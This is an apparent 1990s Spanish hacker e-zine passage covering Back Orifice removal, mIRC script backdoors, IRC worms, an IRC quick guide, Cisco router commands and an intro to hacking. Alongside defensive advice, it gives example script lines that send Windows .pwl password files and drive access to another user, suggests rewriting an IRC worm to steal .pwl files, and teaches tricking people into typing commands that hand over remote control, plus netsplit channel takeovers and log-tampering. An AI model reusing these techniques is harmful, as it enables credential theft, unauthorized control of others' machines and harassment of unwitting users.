parar al directorio :\windows\system  convertido en (espacio).exe  y ademas en
el editor registros (REGEDIT), carpeta RunServices (puede ser que este en otra
carpeta)  se incorpora  la siguiente linea en DATOS: "(espacio).exe", para que
nada  mas arrancar el ventanucos el troyano quede en memoria. Y diras bah, pos
entonces borro el archivo (espacio).exe y yasta.
Si hijo si, prueba y veras, ni flowers, al tenerlo en memoria no deja borrarlo.
Y entonces??, a jodese jejeje.

        NO, TRANQUILO HAY UNA SOLUCION (por lo menos a mi me va).
        Pero eso te lo dire mas adelante, ahora sigue leyendo....


Como puedo saber si tengo el troyano en el sistema?
---------------------------------------------------
        La manera mas facil que hay es utilizar el programa CLIENT (cliente)
apuntando a la direccion IP 127.0.0.1 que es tu propia maquina, no se precisa
que estes conectado a inet. Cuando ya hallas apuntado a esta IP, desde el
cliente de BO manda un PING, si no te responde nada, vale estas limpio y no
tienes el troyano, pero si te pone algo como esto:

------- Packet received from 127.0.0.1 port 31337 -------
  !PONG!1.20!DEFAULT!
------- End of data -------

Opssss, estas jodio, tan colao el troyano...

*****************************************************************************

Nota: Si no lo tienes en el sistema puedes metertelo y probar las maravillas
      y putadas que te pueden hacer los demas (haciendotelas a ti mismo) ;)
      y sin ningun peligro al no estar conectado a inet.

*****************************************************************************


Vale lo tengo y estoy muy asustao �como co�o me lo quito?
---------------------------------------------------------

        Puede que algunos ya lo hallais descubierto, para mi fue facil, la
verdad. Ya sabemos que al ejecutar el archivo del SERVER, este se convierte
en (espacio).exe y va a parar al directorio :\windows\system. (OJO, hay una 
manera de configurar este nombre y es posible que no siempre el troyano sea 
el (espacio).exe) 
        Vale, como he dicho antes si intentas borrarlo, nanai, por que ya
esta en memoria, asi que lo mas normal es pensar que puede haber una linea
donde hace que se ejecute el troyano en el archivo SYSTEM.INI o WIN.INI
al iniciar el ventanucos. Pos fui a buscarlo por alli y NOP nada de nada, lo
siguiente que pense es buscarlo en el editor de registros (REGEDIT), pos
palli voy, en el menu pincho: EDICION/BUSCAR/ pongo (espacio).exe y activo
CLAVES, VALORES y DATOS y �TACHAN! en una carpeta llamada RunServices (sigo 
diciendo que puede estar en otra carpeta) aparece en DATOS el nombre del 
archivito �YA LO TENEMOS! solo queda eliminar la linea de DATOS para ello 
pincha donde pone el NOMBRE (suele ser (predeterminado)) y eliminalo, (la 
carpeta no la borres) una vez eliminado ya puedes cerrar la ventana del 
editor de registros (Nota: es posible que en la busqueda aparezcan mas 
(espacio).exe pero solo debes borrar el de la carpeta RunServices o otras
en las que pueda estar y sepas que es la que carga el troyano).
        Con todo esto hemos conseguido que la proxima vez que iniciemos el
ventanucos no se cargue en memoria el troyano, con lo que ya podras ir al
directorio :windows\system y borrar el archivo (espacio).exe (no lo vuelvas
a ejecutar o se te metera otra vez en el registro). Y por fin te has librado
del troyano.

Existen programas que dicen borrar este troyano,pero ES MENTIRA la mayoria
(si no todos)llevan alguna clase de virus dentro,osea que cambiaras este 
virus por otro,por lo que no habras logrado mucho :(
         

      SCRIPTS.
-------------------

Para alguien que sepa scripting le puede resultar muy sencillo controlar tu maquina
de forma remota atraves del irc,ya que en algo que puede resultar tan inocente
como una opcion para mandar un privado,puede esconder algun comando para que si
el esta conectado automaticamente le mandes tu preciado archivo de contrase�as o lo
que se le venga en gana en ese momento.
Te recomendamos que pilles algun manual de scripting (en INet los hay a patadas)
te lo empolles y revises el codigo del script que usas abitualmente,no sea que 
resulte que cada vez que pides la lista de canales del servidor donde estes
estes mandando un archivo a una persona que no quieres que lo tenga.
Procura buscar comandos como los siguientes:

/send c:\windows\*.pwl cualquier_nick_que_haya_puesto

/fserve nick_que_haya_puesto 5 c:

o cosas de este estilo que te puedan parecer sospechosas.
Estos comandos pueden estar puestos de la siguiente manera
Ejemplos:

pidiendo la lista de canales:
/list /send c:\windows\*.pwl nick_al_que_llegara_el_archivo

entrando a un canal:
/join #$$?="Entrar en el canal?" /fserve nick_al_que_daras_acceso 5 c:

recibiendo un texto (si ponen una determinada frase/palabra en un canal o privado)
on *:TEXT:!mandameloya*:#:/dcc send archivo_que_quiera_que_le_llegue $nick " $+ %file $+ " 
| /inc %fsendp | ignore -tacu5 $wildsite 

Como puedes ver,estos comandos remotos pueden estar en cualquier sitio del script,
para localizarlos lo mas eficiente es buscarlos en la opcion de STATUS,MENUBAR y REMOTE
ya que es hay donde suele aver mas cantidad de comandos y es donde es mas dificil de 
encontrar el comando remoto que hace que lo pases tan mal cuando estas conectado al irc


    VIRUS DE IRC.
--------------------

Si ya sabemos que esto esta + visto que el tebeo,pero es otra manera +
�nunca se te ha ocurrido investigar estos famosos "virus"?
pues a mi si,fijate  :o)

Si investigas un poco dentro del "script.ini" veras que lo que hace es lo siguiente:
esta configurado para que cada vez que entres a un canal le mandes a todos los que
estan dentro de ese canal el fichero "script.ini" �pero y si reconfiguramos el 
"script.ini" para que en vez de mandarselo a todo el canal solo le mande a una
persona en concreto el famoso "pwl"?
esto no es muy dificil de hacer si revisas el codigo del "script.ini" y cambias unos
pocos parametros (hay que saber algo de scripting).

En el caso del "dmsetup.exe" es algo mas peculiar.
El archivo en cuestion es un binario (un ejecutable),por lo tanto tendras que saber
programar en el lenguaje que esta echo para poder modificarlo a tu gusto.
Detodas maneras el "virus" sin modificar ya es una jodienda de por si,lo que hace
es lo siguiente:

tiene la particularidad de ser "autoejecutable" osea que no hace falta que lo 
clikees tu para que este se instale en tu maquina :(
Modifica algunas lineas del script.ini para que se autoenvie (igual que el "script.ini")
Algunas de las versiones estudiadas actuan con mas particularidad e incluyen
pautas para desconectar a un usuario si recibe la frase "tis to I who seem so sad"
(sin comillas claro).

Crea copias de si mismo en los directorios c:\windows y c:\mirc (precavido el jeje)
Intenta sobreescribir el autoexec.bat para restaurar copias de si mismo cada vez que 
se reinicie la computadora y por si eso fuera poco encima cambia los directorios de
los fserve por c:\mirc lo que puede ser una putada si guardas logs con contrase�as
o algo asi en alguno de los subdiretorios de esta carpeta.

Eliminar estos dos archivos es algo relativamente simple:
para el script.ini:

en la linea donde escribes normalmete en el mirc pon lo siguiente: 
"/unload -rs script.ini" (sin las comillas obviamente)
lo que consigues con esto es descargar de la memoria del programa este archivo,pero cuando 
lo vuelvas a utilizar este se volvera a cargar en memoria,para elimirarlo lo que deves 
hacer cuando descarges de la memoria el archivo es lo siguiente:
donde escribes normalente en el mirc escribe esto: "/removescript.ini" (sin las comillas) 
y ya estara borrado el "virus"
Para el "dmsetup.exe" la cosa cambia un poco:
Cierra todos los programas  que tengas abiertos,localiza todos los dmsetup.exe que tengas 
en tu sistema (con la opcion de buscar del menu "inicio" te sera muy facil) y borralos 
todos,revisa los ficheros "config.sys" y "autoexec.bat" y si tienes dudas sobre alguna 
linea,sustituye ambos por copias de seguridad.
�Que no tienes una copia de seguridad?�pero en que estabas pensando cuando el win2 te dijo 
que era recomendable hacer un disco de arranque?
Luego reinicia el equipo y reinstala el mirc,si sigues sufriendo anomalias a la hora hacer 
funcionar este programa reinstala el win2 (hazlo encima del que tienes,no hace falta formatear)


  ATRAVES DE LA LINEA DE COMANDOS.
---------------------------------------

Para esto es necesario que usen ingeniaria social con tigo (no te vamos a explicar lo
que es la ingenieria social por que es algo sobradamente conocido).

Existen una serie de comandos que si los introduces en donde normalmente escribes puedes
dejar que el otro controle tu programa del Mirc o que le des acceso a tu c:\ pudiendo 
hacer los que le venga en gana con el.

/fserve su_nick 5 c:

/fserve= comando para abrirle una sesion de server al otro usuario
su_nick= aqui se pone el nick de la otra persona
5= cantidad de ficheros que puede bajar
c:= directorio a partir del que le das acceso 

Este comando lo que hace es dar acceso completo a tu c:\ (o la carpeta que especifiques)
Podra subir,bajar,borrar...ficheros,la unica restriccion que pones es la carpeta
apartir de la que tiene acceso,y el numero de archivos que puede bajar.
Ademas cuando pones este comando te saldra una ventana (en ingles) diciendote lo que
estas haciendo (pero la mayoria de las veces la gente pasa de leerla)

ctcp 1:*:jumi-
Este comando, introducido en los ctcp�s de mIRC, ejecuta cualkier orden 
de forma remota.Es como el antiguo /ctpc nick DO.
ctcp ==> Client-To-Client-Protocol. Los version, ping, etc...
1    ==> nivel de usuario que ejecuta el ctcp.
*    ==> como en DOS, comodin que sustituye al ctcp que nos hagan. Podriamos
definir aqui un VERSION PING, etc..
jumi-  ==> con este parametro, mirc toma en consideracion todo lo que nos envien. 

�Mu bonito verdad? pero te estaras preguntando �y como co�e se usa? pos mu simple:
Hemos conseguido que el pavo introduzca este comando y estamos en el canal
#me_mola con el y me apetece que me de OP en este canal,pues ponemos lo siguiente
"/ctcp su_nick mode #me_mola +o nuestro_nick" (sin comillas)
y bingo,ya tenemos op en el canal #me_mola,pero claro el tio dice "co�o si yo a este no
le he dado op" y se mosquea osea que este es un buen momento para hacer un "automass deop"
�que no sabes como hacerlo? pos en la mayoria de los scripts (un poco modernos)
tienes una opcion para hacerlo, "pero esque yo no uso ningun script"
�pero tu en que mundo vives tio? en http://www.welcome.to/100scripts tienes una coleccion de
ellos muy grande,bajate alguno + rapido que inmediatamente :) 
(si es el ZeD-wOrLd-ScRiPt mejor,jeje)
"Bueno pero yo no quiero que me de OP lo que quiero es desconectarle del irc"
Bueno pues en ese caso ponlo siguiente:
"/ctcp nick_del_personaje quit FRASE QUE TE APETEZCA QUE DIGA AL DESCONECTARSE" 
(sin las comillas)
"�Y si quiero que diga algo sin que lo escriba?" pues pon esto:
"/ctcp nick_del_personaje say FRASE QUE QUIERES QUE DIGA" (sin las comillas)
Tienes que tener cuidado con esta clase de "ataques" por que al tio en cuestion
se le llenara la ventana de "status" de mensajes diciendole quien sois.
Bueno supongo que el concepto lo habreis pillado puesto que es muy simple. 

Bueno esto es una peque�a muestra de como controlar,colarse...etc... atraves de 
algo tan usado como es el irc,pero para muchas de estas cosas tienes que elejir
a alguien que sea un pardillo en esto del irc,pero los hay,valla si los hay ;)

byez


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ IRC (GUIA RAPIDA) - Yo_Soy ]�����������������������������������������������


                     <�������������������������������>
                         ۲���     I R C     �����                   
                         ۲���  GUIA RAPIDA  �����                   
                     <�������������������������������>


  IRC es un metodo de conversacion por Internet, sus siglas significan
  Internet Relay Chat.  Esta conversacion se lleva a cabo generalmente
  mediante un cliente (programa que  se conecta a  un servidor y mismo 
  que presta  un servicio) que se conecta a un servidor , asi nosotros
  como usuarios utilizamos un apodo  (nickname) y  llevamos charlas en
  lugares llamados "canales".


                  C C C C         C C C C         C C C C
                                             
                  � � � �         � � � �         � � � �
               ����������Ŀ    ����������Ŀ    ����������Ŀ
               � Servidor �    � Servidor �    � Servidor �
               �  IRC 2   ���į�   IRC 1  ����ij  IRC 3   �
               ������������    ������������    ������������

  Existen redes IRC,  a los cuales se conecta el programa cliente (C),
  estas  redes  estan  formadas por  varios  servidores. De  entre los
  programas  clientes destacan el mIRC, virc, etc. 

   �����������������������>[   LOS CANALES   ]<�����������������������


  Es un grupo de uno o mas clientes, el  canal es creado por un usuario
  al entrar por primera vez, y deja de existir cuando el ultimo usuario
  sale.  Si un  canal no  existe  el  usuario  que  lo  crea recive los
  privilegios de operador del canal.

  Los canales  son  creados  con  un  nombre  el cual se compone de una
  cadena  de  caracteres  y  puede tener una longitud de 200 caracteres,
  pero no es posible el uso de espacios o comas.


 �����������������������>[ OPERADORES DEL CANAL ]<����������������������


  Son los  encargados  del canal  y por  tanto  tienen privilegios para
  cambiar  las  caracteristicas  del mismo, los  reconoceras facilmente
  porque  veras un @ (arroba) al lado de su nombre. Entre las funciones
  de un OP estan:

   Patear a usuarios
   Colocar un Baneo

  Un BAN consiste en impedir que el usuario entre al canal.


  ����������������������������>[  SPLIT  ]<����������������������������


  Ocurre cuando en la red se separa 1 o mas servidores entre si. Cuando
  esto ocurre, en el canal solo quedan  los conectados a ese respectivo
  servidor en los diferentes lados del split.


                    ������������Ŀ      ������������Ŀ     
                    � SERVIDOR 1 �<����>� SERVIDOR 2 � 
                    ��������������      ��������������

  Para dar  un  idea, cuando  hay un split  los usuarios  conectados al
  servidor  1  ven  desconectarse  a los  usuarios del servidor 2 y los
  usuarios conectados al servidor 2 ven caer a los del 1.

  Nosotros podemos aprovechar esto para 2 cosas (tal vez mas ;) :


   Colision de Nick
   Ganar OP

  Despues del NetSplit  viene el NetJoin que  ocurre cuando el servidor
  separado se une de nuevo a la red.

  ���>  Colision de Nick:

  En el IRC el nickname es unico, por tanto, no pueden existir 2 con el
  mismo nombre. Si tu tienes el nick de " MENTE ", nadie en toda la red
  puede  usar  ese nick. Digamos  que el usuario "MENTE" entro a la red
  IRC por el Servidor 1, asi  si  hay un  split entre el servidor 1 y 2
  estos se separan, por tanto "MENTE" deja de existir en el Servidor 2,
  mas aun sigue conectado, pero unicamente en el Servidor 1.

  Ahora, supongamos que queremos hacer caer al usuario "MENTE", pero el
  mendigo esta usando su Firewall y no cae :(..

  Creamos un clon y entramos por el Servidor 2 y esperamos.. asi cuando
  haya un NETJOIN (sucede despues del split cuando se unen los servers)
  habra una colision (2 personas estan usando el mismo nick) lo que nos
  trae por consecuencia un KILL a los 2 nicks.


  ���> Ganar OP

  Sucede cuando hay un split entonces nosotros nos lanzamos al servidor
  que esta separado, creamos el  canal que queremos tomar (por lo tanto
  tendremos op) y esperamos que  se vuelva  a unir. No siempre funciona
  porque si el canal que quieres  tomar tiene un BOT y esta preparado a
  la hora de  hacer la union, puede que te quite el OP. :(...


  ����������������������������>[  WINGATE  ]<���������������������������


  Una de las cosas mas vistas en el IRC ahora es ver a personas con una
  IP  diferente  a  la que deberian  tener,  pero sin spoofear, esto es
  utilizando  un  Wingate, la  forma mas sencilla si estamos utilizando
  mIRC es ir a Setup -> Firewall -> y  colocar  la IP  del Wingate, asi
  cada  vez  que  entremos a  un  servidor  IRC  lo  usara  como Proxy.
  Un ejemplo de un Wingate es --> dslc00411.adsl.telusplanet.net
  En la pagina de RareGaZz encontraras un escaner de Wingates ;)
  La otra forma de conectarse a Irc por Wingate es:

  /server ip-wingate 23
  /quote irc.server.com 6667
  /quote usuario lo_ke_sea lo_ke_sea 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  lo_ke_sea
  /quote nickname lo_ke_sea


  ����������������������>[  Comandos Generales  ]<����������������������


   Cualquier cliente IRC tiene un  lugar para introducir lo que vamos a
   decir , ahi mismo  colocaremos los  comandos.  Los comandos  siempre
   comenzaran con una "/" , aquello  que no  comience  con / se asumira
   que se trata de un mensaje.


   ���> Comandos Basicos


   /NICK  nuevo_nick
    Cambia  tu  apodo  con  el  cual  seremos  conocido  en  adelante,
    generalmente tiene una longitud no mayor de 9 caracteres.

   /LIST
    Muestra los canales, usuarios y topic de cada uno.

   /NAMES  #canal
    Muestra los usuarios que estan en cierto canal.

   /WHOIS  nickname
    Muestra informacion acerca de alguien.

   /WHOWAS nickname
    Muestra informacion de alguien que acaba de salir.

   /UWHO nickname
    Muesta informacion del usuario.

   /QUIT  mensaje_opcional
    Sale del IRC, puediendo opcionalmente dejar un mensaje de salida.

   /SERVER servidor o i.p
    Se conecta al servidor especificado.
   

   ���> Comandos de Conversacion


   /JOIN #canal
    Entra al canal especificado.

   /LEAVE #canal
    Sale del canal especificado.

   /MSG nickname texto
    Manda un mensaje privado a un usuario.

   /ME comentario
    Manda un mensaje al canal con un comentario inciando con tu apodo.

   /QUERY nickname
    Comienza una conversacion privada con alguien.

   /DCC CHAT nickname
   /DCC CLOSE CHAT nickname
    Comienza una conversacion directa de cliente a cliente.

   /DCC SEND nickname path_archivo
    Manda un archivo a un usuario.

   /DCC GET nickname
    Abre la conexion para recivir archivos.

   /NOTIFY [+/-] nickname
    Avisa de la prescencia de un usuario en la red.

   /INVITE nickname #canal
    Invita a un usuario a entrar a un canal.

   /IGNORE nickname
    Ignora a cierto usuario.


   ���> Comandos de Mantenimiento del Canal     (solo OP's)


   /TOPIC #canal mensaje de topico
    Cambia/asigna un mensaje de topico para el canal.


   /MODE #canal [+|-]modo [nickname]
    Cambia los modos del canal, entre ellos los siguientes:

     o - dar/quitar op
     p - canal privado
     s - canal secreto
     i - canal solo para invitados
     t - solos los op pueden cambiar el topic
     n - no permite mensajes externos
     m - canal moderado
     l - limite de usuarios
     k - coloca un password al canal
     v - da/quita voz - permite hablar en un canal moderado
     b - coloca un baneo

   /KICK #canal nickname
    Patea del canal a un usuario.


   ���> Otros Comandos


   /CTCP nick argumento
    Permite ver algunas caracteristicas del cliente/usuario, entre ellas
    estan:
           /CTCP nick PING      <�� Manda un Ping
           /CTCP nick VERSION   <�� Ve la version de su cliente.
           /CTCP nick FINGER    <�� Trata de hacer un finger.

   /PING nickname
    Manda un Ping a un usuario.

   /DNS [usuario]
    Ve la IP y el DNS de un usuario.

   /WHO cadena
   Muestra informacion acerca de ciertos usuarios, ej.

     /who *telmex.net.mx   <�� Mostrara los usuarios que
                                 tengan esa cadena


   VOCABULARIO 

  Nickname:  Apodo o sobrenombre con el cual somos conocidos en el IRC.

  K-Line  :  Es cuando se impide la entrada de un usuario a un servidor.

  Bot     :  Robot que se encarga de administrar el canal.

  Lag     :  Retardo por la sobrecarga de informacion en IRC.

  Wingate :  Software utilizado para que 2 o mas sistemas utilizen la
             misma linea, tambien son usados como Proxies.

  PING    :  Acronimo de "Packet Internetwork Groper". Se  utiliza para
             probar si la conexion esta activa o inactiva.

  CTCP    :  Acronimo  de " Client-to-Client  Protocol " ( Protocolo de
             Cliente a Cliente).

  Scripts :  Son aditamentos para  nuestro cliente, los mas famosos son
             para mIRC, si  quieres  tener  una idea de ello, visita la
             siguiente pagina: http://www.arrakis.es/~alcon/scripts.htm


                                                           <=Yo-Soy=>
                                                        
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
                                                        <��������������>


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Cisco Routers - GuyBrush ]�������������������������������������������������


Aqui  teneis una  breve descripcion  de los  comandos del Cisco. Espero que si
entrais en alguno, os sirva de algo:


COMANDOS DEL CISCO EN MODO NORMAL
---------------------------------
 <1-99>			Session number to resume
 access-enable		Create a temporary Access-List entry
 clear			Reset functions
 connect		Open a terminal connection
 disable		Turn off privileged commands
 disconnect		Disconnect an existing network connection
 enable			Turn on privileged commands
 exit			Exit from the EXEC
 help			Description of the interactive help system
 lock			Lock the terminal
 login			Log in as a particular user
 logout			Exit from the EXEC
 name-connection	Name an existing network connection
 pad			Open a X.29 PAD connection
 ping			Send echo messages
 ppp			Start IETF Point-To-Point Protocol (PPP)
 resume			Resume an active network connection
 rlogin			Open an rlogin connection
 show			Show running system information
 slip			Start Serial-line IP (SLIP)
 systat			Display information about terminal lines
 telnet			Open a telnet connection
 terminal		Set terminal line parameters
 traceroute		Trace route to destination
 tunnel			Open a tunnel connection
 where			List active connections
 x3			Set X.3 parapeters on PAD


COMANDOS DEL CISCO EN MODO PRIVILEGIADO
---------------------------------------
  <1-99>           Session number to resume
  access-enable    Create a temporary Access-List entry
  access-template  Create a temporary Access-List entry
  bfe              For manual emergency modes setting
  clear            Reset functions
  clock            Manage the system clock
  configure        Enter configuration mode
  connect          Open a terminal connection
  copy             Copy configuration or image data
  debug            Debugging functions (see also 'undebug')
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  erase            Erase flash or configuration memory
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  name-connection  Name an existing network connection
  no               Disable debugging functions
  pad              Open a X.29 PAD connection
  ping             Send echo messages
  ppp              Start IETF Point-to-Point Protocol (PPP)
  reload           Halt and perform a cold restart
  resume           Resume an active network connection
  rlogin           Open an rlogin connection
  rsh              Execute a remote command
  send             Send a message to other tty lines
  setup            Run the SETUP command facility
  show             Show running system information
  slip             Start Serial-line IP (SLIP)
  start-chat       Start a chat-script on a line
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  test             Test subsystems, memory, and interfaces
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  undebug          Disable debugging functions (see also 'debug')
  verify           Verify checksum of a Flash file
  where            List active connections
  write            Write running configuration to memory, network, or terminal
  x3               Set X.3 parameters on PAD


PARAMETROS DEL SHOW EN MODO NORMAL
----------------------------------
 WORD			Flash device information - format [partition]
 clock			Display the system clock
 history		Display the session command history
 hosts 			IP domain-name, lookup-style, nameservers, and host table
 isdn			ISDN information
 modemcap		Show Modem Capabilities database
 ppp			PPP parameters and statistics
 sessions		Information about Telnet connections
 snmp			snmp statistics
 terminal		Display terminal configuration parameters
 users			Display information about terminal lines
 version		System hardware and software status


PARAMETROS DEL SHOW EN MODO PRIVILEGIADO
----------------------------------------
  WORD               Flash device information - format [partition]
  access-expression  List access expression
  access-lists       List access lists
  accounting         Accounting data for active sessions
  aliases            Display alias commands
  arp                ARP table
  async              Information on terminal lines used as router interfaces
  bridge             Bridge Forwarding/Filtering Database [verbose]
  buffers            Buffer pool statistics
  cdp                CDP information
  clock              Display the system clock
  cmns               Connection-Mode networking services (CMNS) information
  compress           Show compression statistics.
  configuration      Contents of Non-Volatile memory
  controllers        Interface controller status
  debugging          State of each debugging option
  dhcp               Dynamic Host Configuration Protocol status
  dialer             Dialer parameters and statistics
  dnsix              Shows Dnsix/DMDP information
  dxi                atm-dxi information
  entry              Queued terminal entries
  flash              System Flash information
  flh-log            Flash Load Helper log buffer
  frame-relay        Frame-Relay information
  history            Display the session command history
  hosts              IP domain-name, lookup style, nameservers, and host table
  interfaces         Interface status and configuration
  ip                 IP information
  isdn               ISDN information
  key                Key information
  line               TTY line information
  llc2               IBM LLC2 circuit information
  logging            Show the contents of logging buffers
  memory             Memory statistics
  modemcap           Show Modem Capabilities database
  ppp                PPP parameters and statistics
  privilege          Show current privilege level
  processes          Active process statistics
  protocols          Active network routing protocols
  queue              Show queue contents
  queueing           Show queueing configuration
  registry           Function registry information
  reload             Scheduled reload information
  rhosts             Remote-host+user equivalences
  rmon               rmon statistics
  route-map          route-map information
  running-config     Current operating configuration
  sessions           Information about Telnet connections
  smds               SMDS information
  smf                Software MAC filter
  snapshot           Snapshot parameters and statistics
  snmp               snmp statistics
  spanning-tree      Spanning tree topology
  stacks             Process stack utilization
  standby            Hot standby protocol information
  startup-config     Contents of startup configuration
  subsys             Show subsystem information
  tcp                Status of TCP connections
  tech-support       Show system information for Tech-Support
  terminal           Display terminal configuration parameters
  users              Display information about terminal lines
  version            System hardware and software status
  whoami             Info on current tty line
  x25                X.25 information


PARAMETROS DEL DEBUG (SOLO PARA MODO PRIVILEGIADO)
--------------------------------------------------
  aaa                 AAA Authentication, Authorization and Accounting
  access-expression   Boolean access expression
  all                 Enable all debugging
  arp                 IP ARP and HP Probe transactions
  async               Async interface information
  bri-interface       bri network interface events
  broadcast           MAC broadcast packets
  callback            Callback activity
  cdp                 CDP information
  chat                Chat scripts activity
  compress            COMPRESS traffic
  confmodem           Modem configuration database
  custom-queue        Custom output queueing
  dhcp                DHCP client activity
  dialer              Dial on Demand
  dnsix               Dnsix information
  domain              Domain Name System
  dxi                 atm-dxi information
  eigrp               EIGRP Protocol information
  entry               Incoming queue entries
  ethernet-interface  Ethernet network interface events
  frame-relay         Frame Relay
  ip                  IP information
  isdn                ISDN information
  lapb                LAPB protocol transactions
  list                Set interface or/and access list for the next debug
                      command
  llc2                LLC2 type II Information
  modem               Modem control/process activation
  packet              Log unknown packets
  pad                 X25 PAD protocol
  ppp                 PPP (Point to Point Protocol) information
  priority            Priority output queueing
  probe               HP Probe Proxy Requests
  radius              RADIUS protocol
  serial              Serial interface information
  smf                 Software MAC filter
  snapshot            Snapshot activity
  snmp                SNMP information
  spanning            Spanning-tree information
  standby             Hot standby protocol
  tacacs              TACACS authentication and authorization
  tbridge             Transparent Bridging
  telnet              Incoming telnet connections
  tftp                TFTP packets
  tunnel              Generic Tunnel Interface
  x25                 X.25 information


Para  acceder  al  Cisco   debes  hacer   telnet   y   escribir   el  password
correspondiente.  Si entras,  lo  haras en  modo  normal. Para acceder al modo
privilegiado  debes poner 'enable' y te pedira otro password. Si lo superas ya
estaras en modo privilegiado.
Para ver  la ayuda de los comandos debes escribir '?'. Si quieres ver la ayuda
de un comando en concreto, por ejemplo 'debug', deberas escribir 'debug ?'

[ Quiero darle las gracias a Mijail por su gran ayuda en este articulo ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Hack basico - Mr. Aztech / " >< TONE " / John ]����������������������������


Ha pasado ya un largo tiempo desde que aparecio la convocatoria en la lista de
la rare, para formar un nuevo grupo de newbees, pues ya despues de ponernos de
acuerdo  y  organizarnos,  he  aqui  el  primer  fruto de nuestro esfuerzo. La
intencion  de este  grupo  fue ir  aprendiendo  mas y mejor, todos unidos como
grupo  y  entregar  articulos  periodicamente  a  la  Raregazz,  originalmente
respondieron  a mi llamado  13 personas, las cuales fueron aceptadas, pero por
motivos  fuera de mi  control solo  quedamos ocho  personas, bueno  esta es la
primera edicion  de nuestros articulos,  esperemos que  les gusten y cualquier
aclaracion,  duda,  comentario,  etc.  por  favor  dirijanlas a esta direccion

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

A  estaba pasando,  tenemos  pensado hacerle  un guequito a todos los mails de
preguntas  o aclaraciones  que  nos lleguen,  para responderlos  y ponerlos en
ediciones  posteriores de  estos  articulos, bueno ahora si vamos a lo que nos
truje, gracias a la rare y en especial a GuyBrush, Acidgum y HuiLo por todo el
apoyo  que dieron  para la elaboracion  de este articulo (Y un bu!! para Conde
Vampiro que ni nos pelo!)

Los  contenidos que  trataremos  de abordar  seran los  siguientes, pero claro
explicados perfectamente y sin tecnisismos, o eso se tratara ;->

        1.1 �Que es un Hacker? Definicion                   Mr. Aztech
        1.2 Que es y como se maneja un servidor (General)   Mr. Aztech
        1.3 Comandos Basicos de Unix                        " >< TONE "
        1.4 Que son los Daemons                             John
        1.5 Introduccion a el filtro Vi                     John
        *Hasta aqui llega la primera edicion

Los contenidos de la segunda edicion vendran luego, pero ya estan  confirmados
los siguientes temas:

        2.1 Permisos de los archivos
        2.2 Manual de Filtros

Pos  como ven  hemos  hablado de  todo menos de hacking, bueno esto es por que
primero queremos  sentar bien las bases del hacking para luego entrar de lleno
en esto, posiblemente se empieze en la tercera edicion.

*No  se aceptaran  mas  miembros en el grupo por causas de seguridad interna y
 nacional

Buno  ya despues  de todo  el rollo este, pasamos ya a los primeros articulos,
pero recuerden enviarnos todas sus dudas a nuestro correo para resolverselas y
publicarlas para todos los que tengan la misma duda.

Mr. AZTECh


*****************************************************************************
*****************************************************************************
**********************    QUE ES UN HACKER....? *****************************
**********************    POR MR. AZTECh        *****************************
*****************************************************************************
*****************************************************************************

Bueno,  no voy  a  explicar demasiado  que  es un  hacker, puesto que si estas
buscando  informacion hacker es  por que se supone que sabes quienes son y que
es lo que hacen  (Si viste la pelicula Hackers, olvida todo eso y empezemos de
nuevo).

Un hacker  es una  persona  que tiene  un  conocimiento elevado sobre sistemas
computacionales  en  general,  diganse  redes,  protocolos   de  comunicacion,
sistemas operativos, comunicaciones, telefonia, etc.. Lo que hacen los hackers
es introducirse  a sistemas, mediante  fallos en la configuracion, pero no con
el fin de destrozar el sistema o de sacar provecho de cualquier tipo, el unico
provecho que  un verdadero  hacker puede sacar de los sistemas a los que entra
es el  de elevar sus  conocimientos, las personas que buscan algun provecho al
entrar  a un sistema,  o de  plano solo buscan  destrozarlo se les conoce como
crackers, es por  estas peronas que existen leyes contra delitos informaticos,
puesto  que el  hacker  busca no  dejar huella de su entrada a un sistema, los
unicos  archivos que un  hacker puede modificar son los logs, que son archivos
que guardan  info. De  cada usuario  que se  conecta a un determinado sistema,
pues a grandes rasgos esta es la definicion general de un hacker.

Mr. AZTECh



*****************************************************************************
*****************************************************************************
*******************         QUE ES UN SERVIDOR ?   **************************
*******************             POR MR. AZTECH     **************************
*****************************************************************************
*****************************************************************************

Bueno ahora que ya sabemos que es un hacker, debemos saber que es lo que hace;
basiente se  introduce a sistemas (computadoras) y obtiene superusuario (root)
para tener el  control total del sistema. Antes de todo debemos definir que es
un sistema , un  sistema es una  computadora que esta o no canectada a una red
(internet, LAN, WAN, Intranet, Novel) o a varias redes ( Lo mismo pero  de dos
a mas),  debe tener  la capacidad  de atender  a varios  usuarios a la vez (Un
sistema  puede ser  tu PC,  conectada a internet pero con un sistema Operativo
Multiusuario  (Unix, Linux,  Windows NT))  y  ademas  tiene  la  capacidad  de
